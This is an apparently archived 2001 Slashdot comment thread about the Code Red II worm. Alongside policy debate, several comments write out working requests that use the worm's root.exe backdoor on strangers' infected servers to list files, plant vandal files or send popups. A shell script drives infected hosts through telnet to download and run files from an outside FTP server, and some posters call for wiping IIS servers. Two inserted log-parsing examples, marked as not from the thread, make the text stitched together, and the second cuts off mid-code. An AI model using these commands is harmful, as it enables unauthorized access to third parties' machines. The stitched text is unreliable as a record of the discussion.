Code Red II: Shells for the Taking
sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accessible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?
How about if somebody writes a default.ida script which sends the attacking server a GET /default.ida which makes the server go to microsoft.com, download and install the patch, and reboot itself? That'd be neat.
...
I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor sap's computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCKS!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".
I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.
Actually, yes it is based on Code Red Mountain Dew, and Pepsi evidently didn't regard it as negative advertising, as last week they shipped over tons of cases of Code Red MD to the EEye team that named it.
You wasted packets to get this lousy sig.
You need to put down the Gibson crack pipe and start speaking in real-world terms. Square pegs? Ace of spades? Random hallucinatory metaphors do not a persuasive argument make.
Do you have an example of how malformed packets could be used to "take over" something? They're occasionally effective tools for DoS (though less and less as IP protocol handler authors stop making silly assumptions), and I do recall one FreeBSD ipfw vulnerability that hinged on the ability to set a certain flag in the packet header, but basically this is not such a big issue. All the fun and power is at higher levels - in the application layer.
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
None of the above.
The two historical precedents that come to mind are:
- The Grand Canyon midair collision on 30 June 1956
- The sinking of the Titanic
In both cases, technologies failed in ways that (in hindsight) were predictable and even inevitable consequences of growth beyond their roots. In both cases, the response was moderate, incremental, and designed to preserve existing investments in these technologies. The lesson is that the "breaking point" for a widespread infrastructural technology is very hard to reach. And, like it or not, Windows is one of these technologies.
Instead, what we'll see happen is more attention to security, taken in small steps. More people will subscribe to alert services, and they'll be willing to pay more for them. Bosses will start asking sysadmins what they've done for security today, and be more willing to sign purchase orders for security-related work. ISPs will pay a bit more attention to open ports on their home users, and some will scan their networks for known security vulnerabilities. OEMs configuring systems for naive users will discover that people will pay for a "safe out of the box" configuration, so they'll start to offer one. And so on, and so on....
The normal state for an economically useful thing is to be stressed, but not stressed to the breaking point. This should be pretty obvious: if it's not stressed, it was uneconomically overbuilt. We are very far from the breaking point for Windows.
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
A Pepsi product (mountain dew), actually
crack the code
Tastes like cough syrup but has a pretty good kick (hate to think about what that much red food color does to your internal organs though).
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
I kind of find myself wondering, which wastes more bandwidth: the virus itself or all of the discussion about the virus?
I'm assuming the virus wastes vastly more. That said, take a look at the way every news site is covering it, the large images they have accompanying the stories and the vast numbers of people reading them because MSN messenger tells them it's important. I don't know if there is any way of measuring the bandwidth wasted by each but it'd be an interesting ratio to see, if there was.
First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.
Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.
BOOM!
If this keeps happening, this is going to be bad for business in a lot of places.
"It is a greater offense to steal men's labor, than their clothes"
Actually, they moved it to akamai, a large network of servers distributed across the internet. Requests are spread out over several servers, thereby making the site as a whole more resistant to DDOS. (They just happen to be Linux). Microsoft did the same thing with their DNS servers after these were DDOS'd earlier this year. A network like Akamai may be the only real defense against a good DDOS (syn flood, spoofed IPs) that doesn't involve ignoring some legitimate requests as well as the trash.
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
Anyways, if cable modem users are seeing drastically increased ARPing, the targeting of the Code Red III variant should explain it -- hitting non-existent addresses on your subnet will cause the CMTS headend router to ARP out to see who's got that address, you get the picture.
At the very least, it's a good opportunity for users to see how many modems your provider has packed onto your segment. If they've packed too many on there, you can be sure the CMTS router's going to get seriously bogged down.
I have an automated program which sends the IP addresses to the ARIS list *and* to my ISP's security department (those IP's which fall under their management) -- I wonder if ISP's are considering just dropping all packets from infected hosts, so when the customer comes to them and complains, they say "Oh, you're infected, reboot, install the patch, and we'll reconnect you." Seems that this would reduce the load on the CMTS and would be faster than trying to track down each customer individually.
Chad Loder
Rapid 7, Inc. - Next generation security products and services
http://www.rapid7.com
No, someone needs to write a strand that simply shuts down (or better yet wipes out the hard drives of) MS IIS servers. They're a hazard to everyone else on the internet and should be removed.
PLEASE MIRROR THIS and post your mirror URLs in reply to this message (subject Mirror of CodeRed2) since that server is a club server, low bandwidth, low budget. But very secure (Debian on Sparc and well maintained :-)
SlashDot (the pikers )-: wouldn't let me post directly to this page.
Got time? Spend some of it coding or testing
If you consider that @Home's acceptable use policy explicitly says that running servers isn't allowed... there are two interesting things to note. First, there are a lot of people running public web servers that @Home just ignores. Another thing is that it probably wouldn't be a problem legally for @Home to minimize the impact of code red by blocking port 80 traffic like they did with port 137, at least temporarily.
Unfortunately, it doesn't look like the root.exe installed by Code Red has Administrator privileges, which iisreset.exe needs. Or at least, that's my guess, since it isn't working.
$x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
$x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
You can't sue MS (they are bigger than the government, practically). But you can probably sue any company which uses IIS and stores your personal data. If that company was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
Everybody wins.
War is necrophilia.
There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.
Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.
All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
try this:
GET /scripts/root.exe?/c+echo+ren+root.exe+badrootexploit+>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+echo+echo+^>+root.exe+>>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+echo+attrib.exe+root.exe+%u002Br+>>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+echo+dir+>>+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+type+fixme.cmd HTTP/1.0
GET /scripts/root.exe?/c+fixme.cmd HTTP/1.0
this way it renames the old root.exe, creates a new dummy one, and write-protects it so it can't be overwritten by a simple copy command.
If God gave us curiosity
I'm having 2 to 4 alerts every minute from the @home network or road runner.
It's crazy.
onepoint
if you see me, smile and say hello.
So unless it caused noticable congestion it makes no difference in that respect.
---
BDOS ERR ON A:>
Well, right now a lot of people are sending their logs to Dshield, who then notify the owners of the infected machines. grep default.ida access_log* | mail -s 'APACHE' redalert@dshield.org
I get this. I think it means IIS is running on a desktop version of Windows (NT4WKS or W2KPro) rather than a server.
===
The page cannot be displayed
There are too many people accessing the Web site at this time.
---
Please try the following:
Click the Refresh button, or try again later.
Open the 65.29.102.77 home page, and then look for links to the information you want.
HTTP 403.9 - Access Forbidden: Too many users are connected
Internet Information Services
---
Technical Information (for support personnel)
Background:
This error can occur if the Web server is busy and cannot process your request due to heavy traffic.
More information:
Microsoft Support
Yes, the nick is flamebait
I think the notion is that it affects non-Windows people as recipients of unwanted random files. (Code Red affects non-Windows people as port 80 hits, too, but that's relatively trivial, and unlikely for minimally-connected dialup people.)
Except that the strange HTTP requests it puts out cause problems with some embedded webservers...
- sourceforge.com was hacked
- themes.org was hacked
- apache.org was hacked
- the ramen worm
- the lion worm
- the knark rootkit
Things were so bad that Microsoft felt cocky enough to make claim that open source software has "inherent security risks". Well, you can quite rightly laugh at Mundie now for his audacity, but it's ridiculous to start calling for lawsuits against software makers. Do you really believe there is never going to be another exploit targeting open source software? Do you want the creators of that open source software to be sued too when that happens?
Microsoft is a big company, and it can afford lawsuits like that. But if, say, the creators of BIND were sued for an exploit, that would probably be the end of BIND. And it's unlikely anyone would be eager to write an open source replacement, with the threat of lawsuits looming over any potential open source project.
Yabbut that's *still* not "all of us," as with SirCam.
Though, interestingly enough, I haven't seen SirCam. I run a mailing list server, and usually I get a nice sampling of darn near everything caught in the spamtrap... I saw Melissa from a European subscriber way in the wee hours of the morning, which was handy since my then-employer needed a sample to feed to its mail filter. And I still see Snowhite once every couple of days. But no SirCam.
Not that I'm complaining, mind you...
Slashdot's token middle-aged housewife
It's gotten to the editors! It's everywhere! It causes itself to be posted multiple times per day! Hide the women and children!
Slashdot's editors are dickheads
Time the long-awaited "Finger of God" script. Fdisk 'em!
Intelligent Life on Earth
(Copied from the other thread, for those who are working on a way to fix this worm)
I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.
#!/bin/sh
# Code Red ][ Download File script
# Usage: dlfile.sh infectedIP filename
#
# Please set the $FTP and $DIR values to
# the ftp and directory of the patch and shutdown repository
# For ftp.youhavesetup.com/pub/cr
FTP="ftp%2eyouhavesetup%2ecom"
# Directory
DIR="%2fpub%2fcr"
# Each request goes through the worm's root.exe backdoor on the infected host;
# %2f, %3e, %3a, %2d, %2e are the URL-encoded forms of / > : - .
echo "GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile" | telnet "$1" 80
sleep 1
echo "GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3etmpfile" | telnet "$1" 80
sleep 1
echo "GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfile+$FTP+%3edlfile%2ecmd" | telnet "$1" 80
sleep 1
echo "GET /scripts/root.exe?+/k+dlfile%2ecmd" | telnet "$1" 80
:)
I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore
--
I've always wanted to be able to telnet into my Windows box. Where can i get this virus?
--
Mod up a post Rob doesn't like and you'll never mod again
Don't hold your breath. You think a post criticizing MS will get modded up? On slashdot? Yeah right! The MS posse will soon mod it down.
War is necrophilia.
And I will now duck for all those people who will tell you you shouldn't install X on anything connected to the internet. Do a man on tcpdump to see what switch will save traffic to text-readable file.
Enjoy
Yes, I'm seeing an ungodly number of ARP requests as well, which may also be Code Red connected. (Who knows.)
-Rob
Is he still using it? The answer to that question really determines whether or not he is a doofus.
War is necrophilia.
Well, I haven't seen that yet, but I saw something even funnier:
999.999.999.999 - - [04/Aug/2001:23:43:18 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXJust_Kidding___Now_How_About_Running_Apache_Instead_of_IIS HTTP/1.0" 404 282 "-" "-"
(Yes, just some guy with a sense of humor and a web browser, not enough Xs to trigger the overflow ;-)
And even the clueless ones who continue to use inherently defective software such as Outlook and IIS have as much right to sue MS as people who smoked for 50 years have to sue tobacco firms...
Suing software makers for bugs is a "bad idea". How many open source authors are going to want to be held liable for that when they don't even get paid for their work? Not many.
:0 BD
* > 100000
* mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6Ho8OkQ6SD
/dev/null
That is probably illegal, and certainly a bad idea (self reproducing code almost always causes problems even when you don't intend it to) but what I wonder is if you could get away with creating a CGI called default.ida that attempted to automatically connect back to the client, disinfect the machine, and install a patch. It is much less dangerous since it doesn't reproduce, and you could certainly make the argument that it was only done in retaliation to someone (unwittingly) attempting to infect your computer with a virus.
Nope, look at your EULA
I've got a cable modem on nash1.tn.home.com, and my iptables log is seeing a huge number of hits (we're talking an average of several a minute, more or less) to port 80. Since I'm not actually running a web server, I don't have the logs that tell me if this is in fact Code Red, but I suspect that's what a huge amount of this activity is.
It's depressing, really.
-Rob
Speaking of Code Red, mountain dew code red is a highly malicious blend of virus, cough syrup, and caffeine. All are bad except caffeine. Just like this virus, all are bad on windows machines, except those which aren't windows machines. I guess linux is like the caffeine of all soda. The good parts :-)
"If a man watches 3 football games in a row he should be declared legally dead" - A
I think Code Red (and Sircam, which your average Joe will probably lump together with Code Red in his mind) will be the virus that breaks the camel's back. It's gotten constant publicity, it's coming back for a second round, and this time, it wants blood.
:-) Seriously, though, things may get slow, but I have a feeling vigilante efforts (counter-worms, Apache scripts that reboot infected attacking Win boxes, etc.) will keep this from happening.
What will happen? I don't know, but here are some possibilities:
Revolt against Microsoft software. We'd all love for this to happen, but their PR machine is probably too good. Still, we can always hope people realize that MS bears a large part of the responsibility here.
Lawsuit. Assuming the virus writers aren't found, the next logical targets will be Microsoft, and owners of a large number of infected hosts. Why it probably won't happen: suing Microsoft over this draws attention to the fact that your company's computer systems are insecure, and that your admins were too lazy/stupid to install the patch. Microsoft can always hide behind their patch, which was available well in advance, and claim that "everyone knows that bugs happen, and it's up to admins to keep up to date" (never mind that this contradicts their own marketing material--when has inconsistency ever stopped marketing before?). Suing somebody with a large bunch of infected hosts is also silly, since, to be infected by them, you have to be just as inept as them.
Government Intervention. Some state governors may push silly state bills, but they'll be irrelevant. What would really get interesting is if the Feds pass some sort of laws, either making people responsible for keeping their systems secure, or defining what kind of liability software manufacturers are exposed to in these circumstances (i.e., can you sue MS? For how much?). Why it probably won't happen. With Congress and Bush on vacation, not much will get done in at least the next month, and things will probably have come to a head before then. Only if this round does serious damage (perhaps the world's biggest DDoS against some high-profile targets, like Akamai), and another generation of Code Red pops up in September (just in time to catch all those college PCs with their pirated copies of Windows 2000 Server and high bandwidth), will this become a real possibility.
Internet Collapses. I really doubt it, I just had to say it to satisfy Cringley
So, which will it be, folks? This would make a great SlashPoll.
I can understand admins not patching when the fix first hit. The usual "Won't happen to me problem". But now? After all this press? All the news stories?
:)
I think the systems we're seeing infected now are either workstations with IIS installed and the user doesn't know/remember, or servers with no real support staff sitting in a closet somewhere. Now the question is, will they EVER get patched?
Someone whip up a worm that patches systems. Be like a cyberwar from the movies. How cool is that?
heheh! Not only is it a fine remote administration feature, but it's also pretty slick the way machines upgraded in this way advertise their new status to everyone with a webserver on port 80.
Geeky modern art T-shirts
To notify the administrators of the attacking servers you can send their IP followed by the date and time of the attack to aris-report@securityfocus.com. - Please use this format because it's a robot address. http://securityfocus.com/announcements/310
Right now my NIC is flickering like mad, yet Windows 2000 does not show these as incoming or outgoing packets. What is going on?
I wanted to know would it be possible to make a similar virus for Linux using a Bash Shell.
If not, why not?
I still think sircam is more annoying since it affects every email user
Every email user?!? CmdrTaco must run Windows. Let's get him!
Microsoft's EULA prohibits me from suing them for bandwidth charges for the stuff their crap throws at my Linux/Apache setup?
Wow, they must have better lawyers than I thought.
Is there a Windows command line equivalent to "shutdown -h now", by any chance? I know I really shouldn't do it, but I'd be so sorely tempted to write a script that would shut down any infected box that scanned mine.
The more I think about it, the more it seems like a permissible act of self defense. It does no harm to the infected box (if the worm doesn't write itself to disk, as I've read, it actually helps) and prevents the infected box from being used to perpetuate more abuse.
Hmm . . .
Because those who are most vulnerable to the worm/virus are the companies with the most clueless sysadmins, the set of machines with uninstalled service packs (and running Index Server by out-of-the-box default, the vulnerable component) probably largely overlaps the set of Code Red machines.
Yes, having to administer one of these along with Solaris and Linux boxen, I've patched mine (trivial).
It's not as if many /.ers need to be told about the existence of the DEL command, and the intellectual leap required to recognize that the ability to execute an arbitrary command implies the ability to execute a particular command seems rather modest to me.
But before we mod this down as an insult to the intelligence of the /. readership, there is a more interesting issue: This particular inspiration is going to occur to a fair number of vandals, kiddies, and assorted undersocialized individuals. Many of them will do something more destructive with it than posting it to slashdot. More generally, the level of sophistication needed to attack a CRII-compromised machine is low, much lower than even script-kiddie level, low enough that any moderately determined wolfcub with a bent hairpin and a telnet client can do tremendous damage.
Thus, CRII has suddenly created and widely advertised a pool of very vulnerable machines. It would not be surprising to find that the worst damage is done by vandals following along behind CRII, just as looters follow behind natural disasters.
If you take the water away completely and hold the frog over the heat source itself it will roast.
Sorry, I'm "in a mood" today and I couldn't help myself.
Still, it's interesting. If you put the frog in cold water and slowly turn up the heat what it will do, being cold blooded, is go to sleep long before it dies and *poaches.*
What is the relevance and why should anyone care? Lobster.
The correct way to cook a lobster, no matter what *anyone* tells you, is to put it in cold water and bring the heat up. The lobster relaxes and goes to sleep before it cooks.
If you just dump it in hot water it goes " Eeeeeeeeeeee," tightens up all of its muscles and pumps lactic acid throughout its system before it dies.
Starting in cold water is both more humane and results in quite noticeably tastier lobster.
KFG
OR, one group could patch all those infected hosts...or at least notify the admins.
I've got a full analysis of this at http://braddock.com/cr2.html
...timothy and cmdr Taco both showed up to work today wearing matching golf shirts and Dockers pants. Upon further inspection, it was determined that they also had the exact same type of socks, shoes, and belts (they stopped short of comparing underoos). At some point, Hemos was quoted as saying, "You know, I think you two should talk to each other before coming in to work."
--------
Bleah! Heh heh heh... BLEAH BLEAH!!! Ha ha ha ha...
Well, the EULA still applies :) You couldn't sue Microsoft, but you could sue the companies whose servers are infected (and hence spamming your box).
MS has absolutely no liability (legally) in this particular instance. Personally, I think it's gross negligence on their part, and I think some *severe* measures are in order.
Quite frankly, I don't give a shit that they're a monopoly. My local telephone monopoly is *wonderful*. Very nice, very courteous. As a business owner and a consumer, I'm very happy with them. But Microsoft is just plain mean and negligent.
Dave
Barclay family motto:
Aut agere aut mori.
(Either action or death.)
Extra credit: Disinfect the machine with the security patch from the MS Web Site.
As this would be completely passive (Rather than patching the code red code) it should be slightly less dangerous than releasing a new worm to the net. And since it would affect only machines that have already been compromised, it should be slightly less ethically questionable than patching the worm code to do something new and the releasing it. I'm sure I'll get flamed for suggesting it nonetheless...
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
I was curious just how often RedCode attacks. Sure, looking through the apache log files is nice, but it just didn't give me the sense of urgency... the quick succession at which attacks take place. So, I whipped up a quick perl script to play a noise every time I was "attacked". Needless to say, it's getting kind of annoying, but it still is incredible:
#!/usr/bin/perl
use strict;
use warnings;

my $log = "/var/log/your-access.log";   # point this at your Apache access log
system("touch attacks_a");               # baseline file, so the first diff has something to compare

while (1) {
    # count the lines carrying the worm's run of Xs and save the count
    system("cat $log | grep XXXXXXXXXXXXX | cut -d \" \" -f 1 | wc -l > attacks_b");
    my $returnval = system("diff attacks_a attacks_b > /dev/null");
    if (0 != $returnval) {              # the count changed: new hit(s) since the last check
        system("cp -f attacks_b attacks_a");
        system("play buzzer2.aiff &");
    }
    sleep(1);
}
char sig[120] = "\0"
From the article:
The FBI has dismissed using any hack-back tactic as well. "It is not something that we could consider," said spokeswoman Debbie Weierman. "It would basically be viewed as an unauthorized intrusion."
It's not clear from the article whether such an 'unauthorized intrusion' by a private citizen would be illegal, but it might be worth thinking about before you go riding out to do battle with the Red Worm.
Let me make sure I understand this one.
I grep \?XXX from /var/log/apache/access.log:
grep \?XXX /var/log/apache/access.log | mawk '{print($1) }'
Then, for each result, I can telnet to port 80 and remote root the machine with a single GET request for scripts/cmd.exe ??
I have 45 such hits in my log files, mostly from machines at my ISP. That is truly ridiculous.
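Several posts above do the same thing by hand: the page that links every attacking IP, the grep-to-dshield one-liner, the buzzer script, and the grep/mawk pipeline in this post all pull the source IP out of each access_log line and decide whether the request is the worm. Here is that parse as an added example in Python; it is not code from any poster. The sample log lines are constructed, the worm's shellcode tail is abbreviated, and the 200-character threshold is my heuristic for separating the worm's long fixed run of fill characters from a hand-typed joke request like the one quoted above. The fill character is how the two worms are told apart in a log: N for the original Code Red, X for Code Red II.

```python
"""Classify and count Code Red / Code Red II probes in an Apache access_log."""
import re
from collections import defaultdict
from datetime import datetime

# Apache combined format: ip ident user [timestamp] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
IDA_RE = re.compile(r'^/default\.ida\?([NX]+)')          # overflow request against the .ida ISAPI filter
BACKDOOR_RE = re.compile(r'/(?:root|cmd)\.exe\?', re.I)  # someone using (or probing for) the CRII backdoor

# Heuristic (assumption): the worm sends a long fixed run of one fill character;
# a human typing a joke request sends only a handful.
MIN_FILL = 200


def parse_line(line):
    """Split one access_log line into fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["when"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def classify(path):
    """Return 'codered1', 'codered2', 'ida-short', 'backdoor-probe', or None for ordinary traffic."""
    m = IDA_RE.match(path)
    if m:
        fill = m.group(1)
        if len(fill) < MIN_FILL:
            return "ida-short"           # right path, too short to be the overflow
        return "codered1" if fill[0] == "N" else "codered2"
    if BACKDOOR_RE.search(path):
        return "backdoor-probe"
    return None


def summarize(lines):
    """Per source IP: hit counts by class plus first/last time seen. Unparseable lines are skipped."""
    per_ip = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        kind = classify(rec["path"])
        if kind is None:
            continue
        entry = per_ip.setdefault(rec["ip"], {"hits": defaultdict(int),
                                              "first": rec["when"], "last": rec["when"]})
        entry["hits"][kind] += 1
        entry["first"] = min(entry["first"], rec["when"])
        entry["last"] = max(entry["last"], rec["when"])
    return per_ip


# --- constructed sample data (not real traffic); the shellcode tail is abbreviated ---
TAIL = "%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"


def _line(ip, ts, path, status="404", size="282"):
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.0" {status} {size} "-" "-"'


SAMPLE_LOG = [
    _line("10.0.0.5", "04/Aug/2001:23:41:02 -0400", "/default.ida?" + "X" * 224 + TAIL),
    _line("10.0.0.9", "04/Aug/2001:23:42:10 -0400", "/default.ida?" + "N" * 224 + TAIL),
    _line("10.0.0.12", "04/Aug/2001:23:43:18 -0400",
          "/default.ida?XXXXXXXXXXXXXXXXXJust_Kidding___Now_How_About_Running_Apache_Instead_of_IIS"),
    _line("10.0.0.5", "04/Aug/2001:23:45:30 -0400", "/default.ida?" + "X" * 224 + TAIL),
    _line("192.0.2.7", "05/Aug/2001:00:01:00 -0400", "/scripts/root.exe?/c+dir+c:\\"),
    _line("192.0.2.8", "05/Aug/2001:00:02:00 -0400", "/index.html", "200", "1043"),
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for ip, e in sorted(summarize(SAMPLE_LOG).items()):
        print(ip, dict(e["hits"]), e["first"].isoformat(), e["last"].isoformat())
```

Feed a real file with `summarize(open("/var/log/apache/access.log"))`; anything that is not one of the four classes is ignored, so the joke request lands in `ida-short` rather than being mistaken for an infected host, and a request for `root.exe` against your own server shows up as someone else checking whether you carry the backdoor.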
That's pretty damned amazing. To think that weather can be determined by a simple yes or no question.
My only political goal is to see to it that no political party achieves its goals.
Here's where I got:
Suggestions? (Non-destructive, please, the goal is to alert not hurt)-- @rjamestaylor on Ello
With all those destructive virus-writers groups and everything, you'd think by now there'd be an Illuminati-type secret organization of white hat programmers somewhere out there that cripple viruses and release a "serum" strain to inoculate systems and close MS's holes.
It would be illegal of course, but, well, Robin Hood broke the law too.
(I'm not advocating this of course, just thinking it's curious no such organization exists)
W
-------------------
This is my SIG. There are many like it, but this one is mine.
tried that. Unfortunately, you need cygwin wget. Is there an explorer.exe equivalent to wget?
I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.
You can find the results and a link to the script here
I do think that MS deserves some blame because they have made it insanely easy to administrate an NT box functionally but insanely hard to do so competently. The OS is user friendly but very obfuscatory (note that even apple never marketed Macintosh as a server, at least not until OS X-- they sold servers running Apple UNIX). How many questions on the MCSE exams covered planning for disaster recovery or planning for internet security (hint: less than one)? Those of us who prefer UNIX do so because it is easier to administrate properly though it requires more knowledge to do basic tasks... The learning curve is constant and does not get as steep as NT's does...
Microsoft also has a history of poor security programming. For example, the Microsoft implementation of PPTP uses a hash of the user's network password as the encryption key for the session. This does not necessarily make it easy to break into an account, but it does effectively prevent any forward security because your key will not change until your password does... I would not trust them with any critical information or production servers, and that includes IIS.
Not that it matters really-- if FreeBSD and Linux can gain enough dominance, they can effectively take the money out of the small server OS (fewer than 4 processors) and that would be a major blow to Microsoft and it would prevent them from being able to make billions off that industry...
LedgerSMB: Open source Accounting/ERP
Though I feel like one about now... long night. :)
Those are going to a shared e-mail alias. I get copies of everything, as well as a few other people. Unfortunately, because they are coming in many format types, we have to compile them by hand. But absolutely, please do send us the logs and have them in the format requested.
Holy crap. http://www.msnbc.com/news/606910.asp
Always do right. This will gratify some people and astonish the rest. -- Mark Twain
I send you this file to have your advice!
....proudly sports the "Powered by Win2000 Server logo".
I fucking know that you are running Win2k server, that's why you're infected with code red and attacking my poor linux box ;)
"Mary had a crypto key, she kept it in escrow, and everything that Mary said, the Feds were sure to know."
MSNBC has a longer story.
Fox News has a few words to say.
ABC copied the AP story.
CBS still seems to think the red tide is receding.
Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.
While I realize that the press release is unlikely to cover his side of things, this doesn't sound like an equivalent situation. If you have more info, pass it along... I'm not familiar with the case and may be totally off-base. The primary difference seems to be that the other machines weren't attacking his.
The idea of having machines do directed retaliation against attacks is something the government itself uses, as I believe do some companies. While I will grant that changing things on someone else's computer is on questionable ground, I also think that given the circumstances (a machine is attacking yours with a virus) you are probably on safe ground to respond. I think it would only be legal if it was in non-self-propagating form - that is, only used as an automatic response to an attack.
That said, it would be a lot safer if you could filter out governmental IPs... those are the only ones that would be likely to cause any major fuss.
~ Leilah
This is exactly why an infected server should be rebuilt and properly secured...
LedgerSMB: Open source Accounting/ERP
jill.c. Don't regard it as a malicious exploit, it's in fact a very powerful remote administration tool. All our NT boxes are not attached to Internet so we don't worry. :)
Why don't you add a check to stay away from Apache servers?! The worm would be more difficult to trace without all those access.log evidence....
/usr/log/apache man.
You are overloading my
To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:
h prerm
http://forum.swarthmore.edu/epigone/modperl/nehza
It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.
Or you could setup default.ida as a perl script that telnets to the ip's 25 port and sends an email with the fact they have a box thats screwed.. like the guy did here.
so they can keep a count of the infections and see how the worm is propagating through the networks. I myself have been hit 154 times today, but that's a low number because my ISP made our cable modems go dynamic addressing recently. A link to the source code can be found on the page and here. Check frequently, as he updated the code a couple of revisions just today.
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:
n et +send+%25COMPUTERNAME%25+You+have+been+infected+by +the+Code+Red+II+Worm+which+attempted+to+attack+my +server
http://ipaddress/c/inetpub/scripts/root.exe?/c+
%25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as
the title:
CGI Error
The specified CGI application misbehaved by not returning a complete set
of HTTP headers. The headers it did return are:
and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.
The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.
I've been having fun with that myself - I have a list of everyone who hit me here.
Lots are home users who probably don't realize that they have IIS running, but there are a few sites that look like decent sized places.
Last week: 92
Last 32 hours: 196 (175 unique addresses)
Looks like it's concrete bunker time soon... )-:
Got time? Spend some of it coding or testing
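The mod_perl notifier described a few comments up (spot a request for /default.ida, find the owner's mail server, send a note to postmaster@) and the "hits / unique addresses" tallies just above both start from the same step: pulling Code Red probes out of an Apache access log. The following is an added Python example of that step, not code from this thread or from the linked script. It parses constructed combined-format log lines, counts probes per source address, tells the two variants apart by their filler byte (N for the original worm, X for Code Red II, a detail from public worm analyses rather than from this thread), and drafts the postmaster notice. The MX lookup that picks the recipient domain, and the actual delivery, are left to the deployer; the `domain` argument and the sample addresses are assumptions.

```python
"""Tally Code Red probes in an Apache access log and draft postmaster notices.
Added example, not from the thread or the linked mod_perl script."""
import re
from collections import Counter, defaultdict

# Apache common/combined log line; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# Both worms send GET /default.ida?<filler>%u9090...: the original Code Red
# fills with "N", Code Red II with "X" (public worm analyses, not this thread).
# Requiring ten filler bytes keeps a stray request for a real default.ida
# from being counted as a probe.
CODERED_RE = re.compile(r'^/default\.ida\?(?P<fill>[NX])(?P=fill){9,}')

# Constructed sample log (RFC 5737 documentation addresses, made-up payload).
SAMPLE_LOG = [
    '192.0.2.44 - - [05/Aug/2001:03:14:07 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090 HTTP/1.0" 404 288',
    '198.51.100.7 - - [05/Aug/2001:03:15:21 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN%u9090 HTTP/1.0" 404 288',
    '203.0.113.9 - - [05/Aug/2001:03:16:02 -0400] "GET /index.html HTTP/1.1" 200 1043',
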